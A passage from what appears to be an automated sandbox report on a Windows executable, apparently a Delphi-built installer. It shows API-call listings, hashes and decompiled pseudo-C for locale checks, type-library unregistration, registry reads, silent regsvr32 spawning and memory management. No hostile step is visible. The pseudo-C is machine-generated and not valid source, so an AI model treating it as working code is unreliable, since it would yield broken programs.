                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                            • String ID: CreateEvent$TransactNamedPipe
                                                            • API String ID: 2182916169-3012584893
                                                            • Opcode ID: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                            • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                            • Opcode Fuzzy Hash: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                            • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0040DF90(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				void* _t18;
                                                            				signed short _t28;
                                                            				intOrPtr _t35;
                                                            				intOrPtr* _t44;
                                                            				intOrPtr _t47;
                                                            
                                                            				_t42 = __edi;
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_t44 = __edx;
                                                            				_t28 = __eax;
                                                            				_push(_t47);
                                                            				_push(0x40e094);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t47;
                                                            				EnterCriticalSection(0x6d1c14);
                                                            				if(_t28 !=  *0x6d1c2c) {
                                                            					LeaveCriticalSection(0x6d1c14);
                                                            					E0040A1C8(_t44);
                                                            					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
                                                            						if( *0x6d1c10 == 0) {
                                                            							_t18 = E0040DC78(_t28, _t28, _t44, __edi, _t44);
                                                            							L00405254();
                                                            							if(_t28 != _t18) {
                                                            								if( *_t44 != 0) {
                                                            									_t18 = E0040B470(_t44, E0040E0AC);
                                                            								}
                                                            								L00405254();
                                                            								E0040DC78(_t18, _t28,  &_v8, _t42, _t44);
                                                            								E0040B470(_t44, _v8);
                                                            							}
                                                            						} else {
                                                            							E0040DE74(_t28, _t44);
                                                            						}
                                                            					}
                                                            					EnterCriticalSection(0x6d1c14);
                                                            					 *0x6d1c2c = _t28;
                                                            					E0040DAF8(0x6d1c2e, E0040B278( *_t44), 0xaa);
                                                            					LeaveCriticalSection(0x6d1c14);
                                                            				} else {
                                                            					E0040B318(_t44, 0x55, 0x6d1c2e);
                                                            					LeaveCriticalSection(0x6d1c14);
                                                            				}
                                                            				_pop(_t35);
                                                            				 *[fs:eax] = _t35;
                                                            				_push(E0040E09B);
                                                            				return E0040A1C8( &_v8);
                                                            			}










                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                            • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                            • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                            • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                            • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                            • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E00624704(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				void* _t28;
                                                            				intOrPtr* _t30;
                                                            				intOrPtr _t33;
                                                            				intOrPtr* _t37;
                                                            				intOrPtr* _t49;
                                                            				intOrPtr _t61;
                                                            				intOrPtr* _t66;
                                                            				void* _t68;
                                                            				intOrPtr _t70;
                                                            				intOrPtr _t71;
                                                            
                                                            				_t70 = _t71;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_t68 = __eax;
                                                            				_push(_t70);
                                                            				_push(0x62481e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t71;
                                                            				_t66 = E00414020(__ebx, _t68, GetModuleHandleW(L"OLEAUT32.DLL"), L"UnRegisterTypeLib");
                                                            				_t49 = _t66;
                                                            				if(_t66 == 0) {
                                                            					E0060CE84(L"GetProcAddress");
                                                            				}
                                                            				E005C52C8(_t68,  &_v20, _t70);
                                                            				E0040B368( &_v8, _v20);
                                                            				_push(E0040EC28( &_v12));
                                                            				_t28 = E0040AEF4(_v8);
                                                            				_push(_t28);
                                                            				L0043C244();
                                                            				if(_t28 != 0) {
                                                            					E0060CE98(L"LoadTypeLib", _t49, _t28, _t68);
                                                            				}
                                                            				_push( &_v16);
                                                            				_t30 = _v12;
                                                            				_push(_t30);
                                                            				if( *((intOrPtr*)( *_t30 + 0x1c))() != 0) {
                                                            					E0060CE98(L"ITypeLib::GetLibAttr", _t49, _t32, _t68);
                                                            				}
                                                            				_push(_t70);
                                                            				_push(0x6247f1);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t71;
                                                            				_t33 = _v16;
                                                            				_push( *((intOrPtr*)(_t33 + 0x14)));
                                                            				_push( *((intOrPtr*)(_t33 + 0x10)));
                                                            				_push( *(_t33 + 0x1a) & 0x0000ffff);
                                                            				_push( *(_t33 + 0x18) & 0x0000ffff);
                                                            				_push(_t33);
                                                            				if( *_t49() != 0) {
                                                            					E0060CE98(L"UnRegisterTypeLib", _t49, _t34, _t68);
                                                            				}
                                                            				_pop(_t61);
                                                            				 *[fs:eax] = _t61;
                                                            				_t37 = _v12;
                                                            				return  *((intOrPtr*)( *_t37 + 0x30))(_t37, _v16, E006247F8);
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0062481E,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0062A1C5,00000000,0062A1D9), ref: 0062472A
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062476E
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                            • API String ID: 1914119943-2711329623
                                                            • Opcode ID: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
                                                            • Instruction ID: 47cd072b4b06506b06a7a0fd2e311c11a36de303591e536be68bff5c72022a6e
                                                            • Opcode Fuzzy Hash: 222b5e7ee090e2c4018f0ee27552968bac4b15f90272fda75f58545e40cad072
                                                            • Instruction Fuzzy Hash: 19219171610A146FDB14EFA9EC42D6B77EEEF897407124469F410D3291EF78EC008B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E005C7FF4(void* __ebx, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				intOrPtr* _t21;
                                                            				intOrPtr _t61;
                                                            				void* _t68;
                                                            
                                                            				_push(__ebx);
                                                            				_v20 = 0;
                                                            				_v8 = 0;
                                                            				_push(_t68);
                                                            				_push(0x5c80ee);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t68 + 0xfffffff0;
                                                            				_t21 = E00414020(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
                                                            				if(_t21 == 0) {
                                                            					if(E00429D18() != 2) {
                                                            						if(E005C7A14(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
                                                            							E005C793C();
                                                            							RegCloseKey(_v12);
                                                            						}
                                                            					} else {
                                                            						if(E005C7A14(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
                                                            							E005C793C();
                                                            							RegCloseKey(_v12);
                                                            						}
                                                            					}
                                                            					E0040B4C8( &_v20, _v8, 0x5c8204);
                                                            					E00407870(_v20,  &_v16);
                                                            					if(_v16 != 0) {
                                                            					}
                                                            				} else {
                                                            					 *_t21();
                                                            				}
                                                            				_pop(_t61);
                                                            				 *[fs:eax] = _t61;
                                                            				_push(E005C80F5);
                                                            				E0040A1C8( &_v20);
                                                            				return E0040A1C8( &_v8);
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
                                                            • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
                                                            • Opcode Fuzzy Hash: f7e7be658f0a955c462c647893507e18f8cdc3df8b481e5329b6105bcbfa9dbc
                                                            • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E00624BA8(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v13;
                                                            				char _v84;
                                                            				void* _v96;
                                                            				char _v100;
                                                            				char _v104;
                                                            				char _v108;
                                                            				char _v112;
                                                            				char _v116;
                                                            				char _v120;
                                                            				char _v124;
                                                            				char _v128;
                                                            				void* _t58;
                                                            				void* _t91;
                                                            				char _t92;
                                                            				intOrPtr _t110;
                                                            				void* _t120;
                                                            				void* _t123;
                                                            
                                                            				_t118 = __edi;
                                                            				_v116 = 0;
                                                            				_v120 = 0;
                                                            				_v112 = 0;
                                                            				_v108 = 0;
                                                            				_v104 = 0;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				_t120 = __ecx;
                                                            				_t91 = __edx;
                                                            				_v13 = __eax;
                                                            				_push(_t123);
                                                            				_push(0x624d3e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t123 + 0xffffff84;
                                                            				E005C745C( &_v8);
                                                            				_push(0x624d58);
                                                            				E005C4EA4(_v8,  &_v104);
                                                            				_push(_v104);
                                                            				_push(L"regsvr32.exe\"");
                                                            				E0040B550( &_v12, _t91, 3, __edi, _t120);
                                                            				if(_v13 != 0) {
                                                            					E0040B470( &_v12, 0x624d90);
                                                            				}
                                                            				_push(_v12);
                                                            				_push(L" /s \"");
                                                            				_push(_t120);
                                                            				_push(0x624d58);
                                                            				E0040B550( &_v12, _t91, 4, _t118, _t120);
                                                            				_t126 = _t91;
                                                            				if(_t91 == 0) {
                                                            					E0040B4C8( &_v112, _v12, L"Spawning 32-bit RegSvr32: ");
                                                            					E00616130(_v112, _t91, _t118, _t120);
                                                            				} else {
                                                            					E0040B4C8( &_v108, _v12, L"Spawning 64-bit RegSvr32: ");
                                                            					E00616130(_v108, _t91, _t118, _t120);
                                                            				}
                                                            				E00407760( &_v84, 0x44);
                                                            				_v84 = 0x44;
                                                            				_t58 = E0040B278(_v8);
                                                            				if(E0060C038(_t91, E0040B278(_v12), 0, _t126,  &_v100,  &_v84, _t58, 0, 0x4000000, 0, 0, 0) == 0) {
                                                            					E0060CE84(L"CreateProcess");
                                                            				}
                                                            				CloseHandle(_v96);
                                                            				_t92 = E00624AA4( &_v100);
                                                            				if(_t92 != 0) {
                                                            					_v128 = _t92;
                                                            					_v124 = 0;
                                                            					E004244F8(L"0x%x", 0,  &_v128,  &_v120);
                                                            					E005CD508(0x53,  &_v116, _v120);
                                                            					E00429008(_v116, 1);
                                                            					E004098C4();
                                                            				}
                                                            				_pop(_t110);
                                                            				 *[fs:eax] = _t110;
                                                            				_push(E00624D45);
                                                            				E0040A228( &_v120, 5);
                                                            				return E0040A228( &_v12, 2);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseDirectoryHandleSystem
                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                            • API String ID: 2051275411-1862435767
                                                            • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                            • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                            • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E004062CC(int __eax, void* __ecx, void* __edx) {
                                                            				long _v12;
                                                            				int _t4;
                                                            				long _t7;
                                                            				void* _t11;
                                                            				long _t12;
                                                            				void* _t13;
                                                            				long _t18;
                                                            
                                                            				_t4 = __eax;
                                                            				_t24 = __edx;
                                                            				_t20 = __eax;
                                                            				if( *0x6cf05c == 0) {
                                                            					_push(0x2010);
                                                            					_push(__edx);
                                                            					_push(__eax);
                                                            					_push(0);
                                                            					L0040529C();
                                                            				} else {
                                                            					_t7 = E0040A6C4(__edx);
                                                            					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
                                                            					_t11 =  *0x6c507c; // 0x40543c
                                                            					_t12 = E0040A6C4(_t11);
                                                            					_t13 =  *0x6c507c; // 0x40543c
                                                            					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
                                                            					_t18 = E0040A6C4(_t20);
                                                            					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
                                                            				}
                                                            				return _t4;
                                                            			}










                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                            • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                            • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: <T@
                                                            • API String ID: 3320372497-2050694182
                                                            • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                            • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                            • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E00405D88(void* __eax, signed int __edi, void* __ebp) {
                                                            				struct _MEMORY_BASIC_INFORMATION _v44;
                                                            				void* _v48;
                                                            				signed int __ebx;
                                                            				void* _t58;
                                                            				signed int _t61;
                                                            				signed int _t67;
                                                            				void _t70;
                                                            				int _t71;
                                                            				signed int _t78;
                                                            				void* _t79;
                                                            				signed int _t81;
                                                            				intOrPtr _t82;
                                                            				signed int _t87;
                                                            				signed int _t88;
                                                            				signed int _t89;
                                                            				signed int _t92;
                                                            				void* _t96;
                                                            				signed int _t99;
                                                            				void* _t103;
                                                            				intOrPtr _t104;
                                                            				void* _t106;
                                                            				void* _t108;
                                                            				signed int _t113;
                                                            				void* _t115;
                                                            				void* _t116;
                                                            
                                                            				_t56 = __eax;
                                                            				_t89 =  *(__eax - 4);
                                                            				_t78 =  *0x6cf05d; // 0x0
                                                            				if((_t89 & 0x00000007) != 0) {
                                                            					__eflags = _t89 & 0x00000005;
                                                            					if((_t89 & 0x00000005) != 0) {
                                                            						_pop(_t78);
                                                            						__eflags = _t89 & 0x00000003;
                                                            						if((_t89 & 0x00000003) == 0) {
                                                            							_push(_t78);
                                                            							_push(__edi);
                                                            							_t116 = _t115 + 0xffffffdc;
                                                            							_t103 = __eax - 0x10;
                                                            							E00405764();
                                                            							_t58 = _t103;
                                                            							 *_t116 =  *_t58;
                                                            							_v48 =  *((intOrPtr*)(_t58 + 4));
                                                            							_t92 =  *(_t58 + 0xc);
                                                            							if((_t92 & 0x00000008) != 0) {
                                                            								_t79 = _t103;
                                                            								_t113 = _t92 & 0xfffffff0;
                                                            								_t99 = 0;
                                                            								__eflags = 0;
                                                            								while(1) {
                                                            									VirtualQuery(_t79,  &_v44, 0x1c);
                                                            									_t61 = VirtualFree(_t79, 0, 0x8000);
                                                            									__eflags = _t61;
                                                            									if(_t61 == 0) {
                                                            										_t99 = _t99 | 0xffffffff;
                                                            										goto L10;
                                                            									}
                                                            									_t104 = _v44.RegionSize;
                                                            									__eflags = _t113 - _t104;
                                                            									if(_t113 > _t104) {
                                                            										_t113 = _t113 - _t104;
                                                            										_t79 = _t79 + _t104;
                                                            										continue;
                                                            									}
                                                            									goto L10;
                                                            								}
                                                            							} else {
                                                            								if(VirtualFree(_t103, 0, 0x8000) == 0) {
                                                            									_t99 = __edi | 0xffffffff;
                                                            								} else {
                                                            									_t99 = 0;
                                                            								}
                                                            							}
                                                            							L10:
                                                            							if(_t99 == 0) {
                                                            								 *_v48 =  *_t116;
                                                            								 *( *_t116 + 4) = _v48;
                                                            							}
                                                            							 *0x6d1b7c = 0;
                                                            							return _t99;
                                                            						} else {
                                                            							return 0xffffffff;
                                                            						}
                                                            					} else {
                                                            						goto L31;
                                                            					}
                                                            				} else {
                                                            					__eflags = __bl;
                                                            					__ebx =  *__edx;
                                                            					if(__eflags != 0) {
                                                            						while(1) {
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__eflags == 0) {
                                                            								goto L14;
                                                            							}
                                                            							asm("pause");
                                                            							__eflags =  *0x6cf98d;
                                                            							if(__eflags != 0) {
                                                            								continue;
                                                            							} else {
                                                            								Sleep(0);
                                                            								__edx = __edx;
                                                            								__ecx = __ecx;
                                                            								__eax = 0x100;
                                                            								asm("lock cmpxchg [ebx], ah");
                                                            								if(__eflags != 0) {
                                                            									Sleep(0xa);
                                                            									__edx = __edx;
                                                            									__ecx = __ecx;
                                                            									continue;
                                                            								}
                                                            							}
                                                            							goto L14;
                                                            						}
                                                            					}
                                                            					L14:
                                                            					_t14 = __edx + 0x14;
                                                            					 *_t14 =  *(__edx + 0x14) - 1;
                                                            					__eflags =  *_t14;
                                                            					__eax =  *(__edx + 0x10);
                                                            					if( *_t14 == 0) {
                                                            						__eflags = __eax;
                                                            						if(__eax == 0) {
                                                            							L20:
                                                            							 *(__ebx + 0x14) = __eax;
                                                            						} else {
                                                            							__eax =  *(__edx + 0xc);
                                                            							__ecx =  *(__edx + 8);
                                                            							 *(__eax + 8) = __ecx;
                                                            							 *(__ecx + 0xc) = __eax;
                                                            							__eax = 0;
                                                            							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
                                                            							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
                                                            								goto L20;
                                                            							}
                                                            						}
                                                            						 *__ebx = __al;
                                                            						__eax = __edx;
                                                            						__edx =  *(__edx - 4);
                                                            						__bl =  *0x6cf05d; // 0x0
                                                            						L31:
                                                            						__eflags = _t78;
                                                            						_t81 = _t89 & 0xfffffff0;
                                                            						_push(_t101);
                                                            						_t106 = _t56;
                                                            						if(__eflags != 0) {
                                                            							while(1) {
                                                            								_t67 = 0x100;
                                                            								asm("lock cmpxchg [0x6cfaec], ah");
                                                            								if(__eflags == 0) {
                                                            									goto L32;
                                                            								}
                                                            								asm("pause");
                                                            								__eflags =  *0x6cf98d;
                                                            								if(__eflags != 0) {
                                                            									continue;
                                                            								} else {
                                                            									Sleep(0);
                                                            									_t67 = 0x100;
                                                            									asm("lock cmpxchg [0x6cfaec], ah");
                                                            									if(__eflags != 0) {
                                                            										Sleep(0xa);
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L32;
                                                            							}
                                                            						}
                                                            						L32:
                                                            						__eflags = (_t106 - 4)[_t81] & 0x00000001;
                                                            						_t87 = (_t106 - 4)[_t81];
                                                            						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
                                                            							_t67 = _t81 + _t106;
                                                            							_t88 = _t87 & 0xfffffff0;
                                                            							_t81 = _t81 + _t88;
                                                            							__eflags = _t88 - 0xb30;
                                                            							if(_t88 >= 0xb30) {
                                                            								_t67 = E004055DC(_t67);
                                                            							}
                                                            						} else {
                                                            							_t88 = _t87 | 0x00000008;
                                                            							__eflags = _t88;
                                                            							(_t106 - 4)[_t81] = _t88;
                                                            						}
                                                            						__eflags =  *(_t106 - 4) & 0x00000008;
                                                            						if(( *(_t106 - 4) & 0x00000008) != 0) {
                                                            							_t88 =  *(_t106 - 8);
                                                            							_t106 = _t106 - _t88;
                                                            							_t81 = _t81 + _t88;
                                                            							__eflags = _t88 - 0xb30;
                                                            							if(_t88 >= 0xb30) {
                                                            								_t67 = E004055DC(_t106);
                                                            							}
                                                            						}
                                                            						__eflags = _t81 - 0x13ffe0;
                                                            						if(_t81 == 0x13ffe0) {
                                                            							__eflags =  *0x6cfaf4 - 0x13ffe0;
                                                            							if( *0x6cfaf4 != 0x13ffe0) {
                                                            								_t82 = _t106 + 0x13ffe0;
                                                            								E0040567C(_t67);
                                                            								 *((intOrPtr*)(_t82 - 4)) = 2;
                                                            								 *0x6cfaf4 = 0x13ffe0;
                                                            								 *0x6cfaf0 = _t82;
                                                            								 *0x6cfaec = 0;
                                                            								__eflags = 0;
                                                            								return 0;
                                                            							} else {
                                                            								_t108 = _t106 - 0x10;
                                                            								_t70 =  *_t108;
                                                            								_t96 =  *(_t108 + 4);
                                                            								 *(_t70 + 4) = _t96;
                                                            								 *_t96 = _t70;
                                                            								 *0x6cfaec = 0;
                                                            								_t71 = VirtualFree(_t108, 0, 0x8000);
                                                            								__eflags = _t71 - 1;
                                                            								asm("sbb eax, eax");
                                                            								return _t71;
                                                            							}
                                                            						} else {
                                                            							 *(_t106 - 4) = _t81 + 3;
                                                            							 *(_t106 - 8 + _t81) = _t81;
                                                            							E0040561C(_t106, _t88, _t81);
                                                            							 *0x6cfaec = 0;
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						__eflags = __eax;
                                                            						 *(__edx + 0x10) = __ecx;
                                                            						 *(__ecx - 4) = __eax;
                                                            						if(__eflags == 0) {
                                                            							__ecx =  *(__ebx + 8);
                                                            							 *(__edx + 0xc) = __ebx;
                                                            							 *(__edx + 8) = __ecx;
                                                            							 *(__ecx + 0xc) = __edx;
                                                            							 *(__ebx + 8) = __edx;
                                                            							 *__ebx = 0;
                                                            							__eax = 0;
                                                            							__eflags = 0;
                                                            							_pop(__ebx);
                                                            							return 0;
                                                            						} else {
                                                            							__eax = 0;
                                                            							__eflags = 0;
                                                            							 *__ebx = __al;
                                                            							_pop(__ebx);
                                                            							return 0;
                                                            						}
                                                            					}
                                                            				}
                                                            			}





























                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00628E3C(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
                                                            				intOrPtr _v8;
                                                            				char _v9;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				void* _t44;
                                                            				intOrPtr _t50;
                                                            				void* _t51;
                                                            				void* _t65;
                                                            				void* _t71;
                                                            				void* _t76;
                                                            				intOrPtr _t88;
                                                            				signed int _t103;
                                                            				void* _t104;
                                                            				char _t106;
                                                            				void* _t109;
                                                            				void* _t122;
                                                            
                                                            				_t122 = __fp0;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_v24 = 0;
                                                            				_v8 = __ecx;
                                                            				_t106 = __edx;
                                                            				_t76 = __eax;
                                                            				_push(_t109);
                                                            				_push(0x628fc2);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t109 + 0xffffffec;
                                                            				_t103 = E0060C330(__eax, __edx, __eflags);
